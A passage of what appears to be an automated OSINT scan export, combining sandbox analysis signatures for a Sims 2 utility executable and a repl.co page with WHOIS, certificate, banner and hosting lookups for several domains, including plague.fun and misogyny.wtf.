"HKLM\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\DISALLOWED\\CERTIFICATES\\2B84BFBB34EE2EF949FE1CBE30AA026416EB2216"; Key: "BLOB")\n "Sims2RPCSettings.exe" (Path: "HKLM\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\DISALLOWED\\CERTIFICATES\\3A850044D8A195CD401A680C012CB0A3B5F8DC08"; Key: "BLOB")\n "Sims2RPCSettings.exe" (Path: "HKLM\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\DISALLOWED\\CERTIFICATES\\43D9BCB568E039D073A74A71D8511F7476089CC3"; Key: "BLOB")\n "Sims2RPCSettings.exe" (Path: "HKLM\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\DISALLOWED\\CERTIFICATES\\471C949A8143DB5AD5CDF1C972864A2504FA23C9"; Key: "BLOB")\n "Sims2RPCSettings.exe" (Path: "HKLM\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\DISALLOWED\\CERTIFICATES\\61793FCBFA4F9008309BBA5FF12D2CB29CD4151A"; Key: "BLOB")'}, {u'category': u'General', u'origin': u'String', u'identifier': u'string-7', u'name': u'Contains PDB pathways', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 2, u'description': u'"%USERPROFILE%\\source\\repos\\Sims2RPCSettings\\Sims2RPCSettings\\obj\\Release\\Sims2RPCSettings.pdb"'}, {u'category': u'General', u'origin': u'Static Parser', u'identifier': u'static-95', u'name': u'PE file contains writable sections', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 0, u'description': u'"Sims2EP9RPC.exe" has an writable section named ".data"\n "Sims2EP9RPC.exe" has an writable section named "PIXO_2D"\n "Sims2EP9RPC.exe" has an writable section named "STLPORT_"\n "Sims2EP9RPC.exe" has an writable section named "LBMPEG_D"\n "Sims2EP9RPC.exe" has an writable section named "Stext"\n "Sims2EP9RPC.exe" has an writable section named "Sdata"\n "Sims2EP9RPC.exe" has an writable section named "Sidata"\n "Sims2EP9RPC.exe" has an writable section named ".securom"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"ocsp.sectigo.com"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "Tar3471.tmp" as clean (type is "data")'}, {u'category': u'General', u'origin': u'Static Parser', u'identifier': u'static-124', u'name': u'PE file has a big virtual size section', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 0, u'description': u'Virtual size of ".text" is "0x279750" greater than 0x100000\n Virtual size of ".text" is "0xdd2000" greater than 0x100000\n Virtual size of ".rdata" is "0x1e9000" greater than 0x100000\n Virtual size of ".data" is "0x104000" greater than 0x100000\n Virtual size of "Stext" is "0x6c8000" greater than 0x100000\n Virtual size of "Sdata" is "0x25d000" greater than 0x100000\n Virtual size of ".securom" is "0x11b94e0" greater than 0x100000'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"74.114.154.18:443"\n "185.199.108.153:443"\n "34.149.204.188:443"'}, {u'category': u'General', u'origin': u'Registry Access', u'identifier': u'registry-18', u'name': u'Accesses Software Policy Settings', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1012', u'threat_level_human': u'informative', u'capec_id': u'CAPEC-647', u'attck_id': u'T1012', u'relevance': 10, u'threat_level': 0, u'type': 3, u'description': u'"Sims2RPCSettings.exe" (Path: "HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\TRUSTEDPEOPLE\\CERTIFICATES"; Key: "")\n "Sims2RPCSettings.exe" (Path: "HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\TRUSTEDPEOPLE"; Key: "")\n "Sims2RPCSettings.exe" (Path: "HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\TRUST\\CTLS"; Key: "")\n "Sims2RPCSettings.exe" (Path: "HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\TRUST\\CRLS"; Key: "")\n "Sims2RPCSettings.exe" (Path: "HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\TRUST\\CERTIFICATES"; Key: "")\n "Sims2RPCSettings.exe" (Path: "HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\TRUST"; Key: "")\n "Sims2RPCSettings.exe" (Path: "HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\TRUST\\CTLS"; Key: "")\n "Sims2RPCSettings.exe" (Path: "HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\TRUST\\CRLS"; Key: "")\n "Sims2RPCSettings.exe" (Path: "HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\TRUST\\CERTIFICATES"; Key: "")\n "Sims2RPCSettings.exe" (Path: "HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\TRUST"; Key: "")\n "Sims2RPCSettings.exe" (Path: "HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\TRUSTEDPEOPLE\\CTLS"; Key: "")\n "Sims2RPCSettings.exe" (Path: "HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\TRUSTEDPEOPLE\\CRLS"; Key: "")\n "Sims2RPCSettings.exe" (Path: "HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\TRUSTEDPEOPLE\\CTLS"; Key: "")\n "Sims2RPCSettings.exe" (Path: "HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\TRUSTEDPEOPLE\\CRLS"; Key: "")\n "Sims2RPCSettings.exe" (Path: "HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\TRUSTEDPEOPLE\\CERTIFICATES"; Key: "")\n "Sims2RPCSettings.exe" (Path: "HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\TRUSTEDPEOPLE"; Key: "")\n "Sims2RPCSettings.exe" (Path: "HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\ROOT\\CTLS"; Key: "")\n "Sims2RPCSettings.exe" (Path: "HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\ROOT\\CRLS"; Key: "")\n "Sims2RPCSettings.exe" (Path: "HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\ROOT\\CERTIFICATES"; Key: "")\n "Sims2RPCSettings.exe" (Path: "HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\ROOT"; Key: "")'}, {u'category': u'Ge 34.149.204.188 2022-12-18 00:06:31 Company Name No Company Name Extractor 0 0 2 0 None ENOM, INC. Domain Name: PLAGUE.FUN Registry Domain ID: D268611982-CNIC Registrar WHOIS Server: whois.enom.com Registrar URL: https://www.enom.com/ Updated Date: 2022-12-05T18:48:20.0Z Creation Date: 2022-01-08T12:59:17.0Z Registry Expiry Date: 2023-01-08T23:59:59.0Z Registrar: eNom, Inc. Registrar IANA ID: 48 Domain Status: serverHold https://icann.org/epp#serverHold Registrant Organization: Data Protected Registrant State/Province: WA Registrant Country: US Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Name Server: GARRETT.NS.CLOUDFLARE.COM Name Server: JOURNEY.NS.CLOUDFLARE.COM DNSSEC: unsigned Billing Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Registrar Abuse Contact Email: domainabuse@tucows.com Registrar Abuse Contact Phone: +49.2283296859 URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/ >>> Last update of WHOIS database: 2022-12-18T00:02:49.0Z <<< For more information on Whois status codes, please visit https://icann.org/epp >>> IMPORTANT INFORMATION ABOUT THE DEPLOYMENT OF RDAP: please visit https://www.centralnic.com/support/rdap <<< The Whois and RDAP services are provided by CentralNic, and contain information pertaining to Internet domain names registered by our our customers. By using this service you are agreeing (1) not to use any information presented here for any purpose other than determining ownership of domain names, (2) not to store or reproduce this data in any way, (3) not to use any high-volume, automated, electronic processes to obtain data from this service. Abuse of this service is monitored and actions in contravention of these terms will result in being permanently blacklisted. All data is (c) CentralNic Ltd (https://www.centralnic.com) Access to the Whois and RDAP services is rate limited. For more information, visit https://registrar-console.centralnic.com/pub/whois_guidance. Domain Name: plague.fun Registry Domain ID: D268611982-CNIC Registrar WHOIS Server: WHOIS.ENOM.COM Registrar URL: WWW.ENOM.COM Updated Date: 2022-12-05T18:48:20.00Z Creation Date: 2022-01-08T12:59:00.00Z Registrar Registration Expiration Date: 2023-01-08T23:59:59.00Z Registrar: ENOM, INC. Registrar IANA ID: 48 Domain Status: serverHold https://www.icann.org/epp#serverHold Registrant Name: REDACTED FOR PRIVACY Registrant Organization: REDACTED FOR PRIVACY Registrant Street: REDACTED FOR PRIVACY Registrant Street: Registrant City: REDACTED FOR PRIVACY Registrant State/Province: Alpes-Maritimes Registrant Postal Code: REDACTED FOR PRIVACY Registrant Country: FR Registrant Phone: REDACTED FOR PRIVACY Registrant Phone Ext: Registrant Fax: REDACTED FOR PRIVACY Registrant Email: https://tieredaccess.com/contact/177ad87c-41f0-4b87-926f-459f450a86e9 Admin Name: REDACTED FOR PRIVACY Admin Organization: REDACTED FOR PRIVACY Admin Street: REDACTED FOR PRIVACY Admin Street: Admin City: REDACTED FOR PRIVACY Admin State/Province: REDACTED FOR PRIVACY Admin Postal Code: REDACTED FOR PRIVACY Admin Country: REDACTED FOR PRIVACY Admin Phone: REDACTED FOR PRIVACY Admin Phone Ext: Admin Fax: REDACTED FOR PRIVACY Admin Email: REDACTED FOR PRIVACY Tech Name: REDACTED FOR PRIVACY Tech Organization: REDACTED FOR PRIVACY Tech Street: REDACTED FOR PRIVACY Tech Street: Tech City: REDACTED FOR PRIVACY Tech State/Province: REDACTED FOR PRIVACY Tech Postal Code: REDACTED FOR PRIVACY Tech Country: REDACTED FOR PRIVACY Tech Phone: REDACTED FOR PRIVACY Tech Phone Ext: Tech Fax: REDACTED FOR PRIVACY Tech Email: REDACTED FOR PRIVACY Name Server: GARRETT.NS.CLOUDFLARE.COM Name Server: JOURNEY.NS.CLOUDFLARE.COM DNSSEC: unsigned Registrar Abuse Contact Email: ABUSE@ENOM.COM Registrar Abuse Contact Phone: +1.4259744689 URL of the ICANN WHOIS Data Problem Reporting System: HTTPS://ICANN.ORG/WICF >>> Last update of WHOIS database: 2022-12-18T00:02:49.00Z <<< For more information on Whois status codes, please visit https://icann.org/epp The data in this whois database is provided to you for information purposes only, that is, to assist you in obtaining information about or related to a domain name registration record. We make this information available "as is," and do not guarantee its accuracy. By submitting a whois query, you agree that you will use this data only for lawful purposes and that, under no circumstances will you use this data to: (1) enable high volume, automated, electronic processes that stress or load this whois database system providing you this information; or (2) allow, enable, or otherwise support the transmission of mass unsolicited, commercial advertising or solicitations via direct mail, electronic mail, or by telephone. The compilation, repackaging, dissemination or other use of this data is expressly prohibited without prior written consent from us. We reserve the right to modify these terms at any time. By submitting this query, you agree to abide by these terms. Version 6.3 4/3/2002 2022-12-18 00:10:03 Linked URL - Internal No URLScan.io 1 0 1 0 None http://plague.fun/ plague.fun 2022-12-18 00:06:59 Raw Data from RIRs No Hybrid Analysis 0 0 2 0 None [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': None, u'total_processes': 3, u'threat_score': 35, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://unwieldywetcondition.pedromedina8.repl.co/', u'signatures': [{u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"34.149.204.188:443"\n "173.222.100.91:80"\n "142.250.189.234:443"\n "142.250.191.35:80"\n "142.250.189.163:443"\n "184.31.203.241:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"x1.c.lencr.org"\n "ocsp.pki.goog"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"ocsp.pki.goog"\n "unwieldywetcondition.pedromedina8.repl.co"\n "x1.c.lencr.org"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar2C72.tmp" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar2CE1.tmp" as clean (type is "data")'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_320"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesLockedCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_140_IE_EarlyTabStart_0x34c_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_140_ConnHashTable<320>_HashTable_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_140_IESQMMUTEX_0_303"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_140_IESQMMUTEX_0_331"\n "\\Sessions\\1\\BaseNamedObjects\\{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\InternetShortcutMutex"\n "IsoScope_140_IESQMMUTEX_0_331"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_140_IE_EarlyTabStart_0x34c_Mutex"\n "IsoScope_140_IESQMMUTEX_0_519"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "IsoScope_140_IESQMMUTEX_0_303"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"57C8EDB95DF3F0AD4EE2DC2B8CFD4157" has type "Microsoft Cabinet archive data 4817 bytes 1 file"\n "Cab2CE0.tmp" has type "Microsoft Cabinet archive data 62397 bytes 1 file"\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data 62397 bytes 1 file"\n "Cab2C61.tmp" has type "Microsoft Cabinet archive data 62397 bytes 1 file"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-37', u'name': u'Drops files inside appdata directory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 5, u'threat_level': 0, u'type': 8, u'description': u'Dropped file: "S822N3FN.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\S822N3FN.txt]- [targetUID: 00000000-00002856]\n Dropped file: "8QR1102B.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\8QR1102B.txt]- [targetUID: 00000000-00000320]\n Dropped file: "NI6OGMZX.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\NI6OGMZX.txt]- [targetUID: 00000000-00000320]'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "S822N3FN.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\S822N3FN.txt]- [targetUID: 00000000-00002856]\n "~DF7E2A7E333D5EB1D1.TMP" has type "data"- Location: [%TEMP%\\~DF7E2A7E333D5EB1D1.TMP]- [targetUID: 00000000-00000320]\n "6BADA8974A10C4BD62CC921D13E43B18_1DC6D7385EA816C957BA2B715AC5C442" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\6BADA8974A10C4BD62CC921D13E43B18_1DC6D7385EA816C957BA2B715AC5C442]- [targetUID: 00000000-00000320]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00002856]\n "RecoveryStore._F31FE297-4B11-11ED-BF0C-080027525002_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA]- [targetUID: 00000000-00002856]\n "search_2_.json" has type "ASCII text with no line terminators"- [targetUID: N/A]\n "F07644E38ED7C9F37D11EEC6D4335E02_D4DDF242A8972F898C0FE0D6EA6919E3" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\F07644E38ED7C9F37D11EEC6D4335E02_D4DDF242A8972F898C0FE0D6EA6919E3]- [targetUID: 00000000-00002856]\n "265C0DEB29181DD1891051371C5F863A_14F2E352CCFE495001982FFDAAC3BE84" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\265C0DEB29181DD1891051371C5F863A_14F2E352CCFE495001982FFDAAC3BE84]- [targetUID: 00000000-00002856]\n "80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53]- [targetUID: 00000000-00000320]\n "_FDAAC88E-4B11-11ED-BF0C-080027525002_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "css_2_.css" has type "ASCII text"- [targetUID: N/A]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776]- [targetUID: 00000000-00002856]\n "57C8EDB95DF3F0AD4EE2DC2B8CFD4157" has type "Microsoft Cabinet archive data 4817 bytes 1 file"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\57C8EDB95DF3F0AD4EE2DC2B8CFD4157]- [targetUID: 00000000-00002856]\n "8QR1102B.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\8QR1102B.txt]- [targetUID: 00000000-00000320]\n "~DFFE7FD93139B78B1E.TMP" has type "data"- Location: [%TEMP%\\~DFFE7FD93139B78B1E.TMP]- [targetUID: 00000000-00000320]'}, {u'category': u'Network Related', u'origin': u'String', u'identifier': u'string-102', u'name': u'Decrypted SSL network traffic', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1573', u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'"GET / HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: unwieldywetcondition.pedromedina8.repl.co\nDNT: 1\nConnection: Keep-Alive"\n "}\n\n @media (max-width: 500px) {\n .message {\n flex-direction: column;\n align-items: center;\n }\n }\n\n .eval-bot {\n margin: 4em;\n }\n\n .console {\n background-color: #0e1628;\n color: #fff;\n font-family: "IBM Plex Sans", "sans";\n padding: 1em;\n margin: 1em;\n }\n\n .footer-item {\n margin: 1em;\n display: flex;\n justify-content: center;\n align-items: center;\n }\n\n .link-icon {\n margin-right: 8px;\n margin-top: 4px;\n }\n\n a {\n color: #c2c8cc;\n }\n \n\n \n \n\n \n
\n
\n
\n \n \n Not Found

404 - Not Found

\n", "_encoding": {"body": "DISPLAY_UTF8", "html_title": "DISPLAY_UTF8", "html_tags": "DISPLAY_UTF8", "body_hash": "DISPLAY_UTF8"}, "html_title": "Not Found", "protocol": "HTTP/1.1", "body_size": 88, "body_hashes": ["sha256:9112cd25c08247edd8945a300d21e1cba019358a92c58d593443c008e4119f64", "sha1:75710e20f9c5609e3325dd9805d690a3647f1af0"], "status_code": 404, "body_hash": "sha1:75710e20f9c5609e3325dd9805d690a3647f1af0", "headers": {"_encoding": {"Te": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8"}, "Te": ["chunked"], "Content_Type": ["text/html"]}, "html_tags": ["Not Found"], "status_reason": "Not Found"}, "supports_http2": false}, "truncated": false, "service_name": "HTTP", "_decoded": "http", "banner_hashes": ["sha256:33ba33c89a0dbfc718b2f90371a8c54fac320ec0f256108c802f929f8588d06a"], "source_ip": "167.248.133.60", "extended_service_name": "HTTP", "observed_at": "2022-12-17T01:52:06.091731713Z", "banner_hex": "485454502f312e3120343034204e6f7420466f756e640d0a54453a206368756e6b65640d0a5472616e736665722d456e636f64696e673a206368756e6b65640d0a436f6e74656e742d547970653a20746578742f68746d6c0d0a", "perspective_id": "PERSPECTIVE_NTT", "banner": "HTTP/1.1 404 Not Found\r\nTE: chunked\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\n", "port": 50997}], "autonomous_system": {"bgp_prefix": "90.116.0.0/16", "country_code": "FR", "asn": 3215, "name": "France Telecom - Orange", "description": "France Telecom - Orange"}} 90.116.166.104 2022-12-18 00:21:23 Software Used Yes Censys 0 0 2 0 None CloudFlare CloudFlare Load Balancer 2606:4700:3032::ac43:be81 2022-12-18 00:14:31 Physical Location No ipstack 0 0 2 0 None Colombia 188.114.97.9 2022-12-18 00:29:09 Similar Domain - Whois No Whois 0 0 2 0 None Domain name: plague.co.uk Registrant: TwentyTwenty Media Limited Registrant type: UK Limited Company, (Company number: 3730401) Registrant's address: Spectrum House 9 Bromells Road London SW4 0BN United Kingdom Data validation: Nominet was able to match the registrant's name and address against a 3rd party data source on 29-Mar-2017 Registrar: TwentyTwentyMedia Limited [Tag = TTMEDIA] Relevant dates: Registered on: 16-Apr-2003 Expiry date: 16-Apr-2023 Last updated: 21-Nov-2022 Registration status: Registered until expiry date. Name servers: ns1.tt550.parklogic.com ns2.tt550.parklogic.com WHOIS lookup made at 00:29:09 18-Dec-2022 -- This WHOIS information is provided for free by Nominet UK the central registry for .uk domain names. This information and the .uk WHOIS are: Copyright Nominet UK 1996 - 2022. You may not access the .uk WHOIS or use any data from it except as permitted by the terms of use available in full at https://www.nominet.uk/whoisterms, which includes restrictions on: (A) use of the data for advertising, or its repackaging, recompilation, redistribution or reuse (B) obscuring, removing or hiding any or all of this notice and (C) exceeding query rate or volume limits. The data is provided on an 'as-is' basis and may lag behind the register. Access may be withdrawn or restricted at any time. plague.co.uk 2022-12-18 00:19:10 Hosting Provider No Hosting Provider Identifier 0 0 3 0 None register.it: http://we.register.it/ 81.88.48.102 2022-12-18 00:08:38 BGP AS Membership No RIPE 0 0 3 0 None 13335 104.21.16.0/20 2022-12-18 00:03:06 Internet Name No DNS Resolver 0 0 2 0 None misogyny.wtf Certificate: Data: Version: 3 (0x2) Serial Number: 04:3b:c1:da:8c:2d:8d:3c:49:c8:fb:3d:44:b5:c2:87:b4:3a Signature Algorithm: ecdsa-with-SHA384 Issuer: C=US, O=Let's Encrypt, CN=E1 Validity Not Before: Sep 20 20:09:20 2022 GMT Not After : Dec 19 20:09:19 2022 GMT Subject: CN=*.misogyny.wtf Subject Public Key Info: Public Key Algorithm: id-ecPublicKey Public-Key: (256 bit) pub: 04:9e:35:88:49:0b:b7:05:fb:30:39:91:2c:a4:c8: 3d:37:20:a3:92:d0:d2:11:82:4f:c7:bd:e3:16:9d: be:3d:3f:14:1f:c4:fd:44:00:d3:22:0e:0a:15:80: 32:c2:39:da:b8:ae:34:4f:14:01:a5:16:f7:6e:eb: 30:0a:c1:cc:d2 ASN1 OID: prime256v1 NIST CURVE: P-256 X509v3 extensions: X509v3 Key Usage: critical Digital Signature X509v3 Extended Key Usage: TLS Web Server Authentication, TLS Web Client Authentication X509v3 Basic Constraints: critical CA:FALSE X509v3 Subject Key Identifier: 88:24:DF:9C:20:E2:63:56:23:30:02:EA:37:31:97:44:FC:90:64:46 X509v3 Authority Key Identifier: keyid:5A:F3:ED:2B:FC:36:C2:37:79:B9:52:30:EA:54:6F:CF:55:CB:2E:AC Authority Information Access: OCSP - URI:http://e1.o.lencr.org CA Issuers - URI:http://e1.i.lencr.org/ X509v3 Subject Alternative Name: DNS:*.misogyny.wtf, DNS:misogyny.wtf X509v3 Certificate Policies: Policy: 2.23.140.1.2.1 Policy: 1.3.6.1.4.1.44947.1.1.1 CPS: http://cps.letsencrypt.org CT Precertificate SCTs: Signed Certificate Timestamp: Version : v1 (0x0) Log ID : 41:C8:CA:B1:DF:22:46:4A:10:C6:A1:3A:09:42:87:5E: 4E:31:8B:1B:03:EB:EB:4B:C7:68:F0:90:62:96:06:F6 Timestamp : Sep 20 21:09:20.492 2022 GMT Extensions: none Signature : ecdsa-with-SHA256 30:45:02:20:4B:FA:2E:39:B5:4A:7E:1E:99:95:86:B9: B3:8A:E4:80:9D:CD:AB:17:D7:B7:40:4F:C3:9B:ED:54: 24:9C:11:BD:02:21:00:FD:45:FB:F2:A1:3E:CD:E8:A2: CC:34:29:02:72:8C:EB:99:C0:CA:A0:21:99:F7:A1:5B: C1:74:A7:32:F7:42:7F Signed Certificate Timestamp: Version : v1 (0x0) Log ID : 29:79:BE:F0:9E:39:39:21:F0:56:73:9F:63:A5:77:E5: BE:57:7D:9C:60:0A:F8:F9:4D:5D:26:5C:25:5D:C7:84 Timestamp : Sep 20 21:09:20.448 2022 GMT Extensions: none Signature : ecdsa-with-SHA256 30:46:02:21:00:FC:14:96:0B:ED:FC:D9:C5:2A:9E:6F: 52:EE:C7:06:D0:67:B9:01:DA:56:7D:5C:92:2F:10:76: DF:F1:5D:90:3E:02:21:00:B4:D1:00:98:21:12:BC:2A: 54:52:F2:E6:8B:33:79:69:58:57:C6:67:70:5C:DA:3B: E7:67:04:E5:84:09:7B:A8 Signature Algorithm: ecdsa-with-SHA384 30:64:02:30:0c:9f:02:9e:a6:3f:cd:3b:85:32:2b:49:96:f2: 00:58:fd:40:65:de:b9:94:b5:11:ef:8a:23:0c:07:ec:f5:75: 18:07:07:24:15:e7:ea:8b:b4:36:77:75:83:eb:b0:3e:02:30: 2d:3e:43:61:54:0c:77:dc:17:fe:4d:45:de:d3:ad:b2:35:a2: 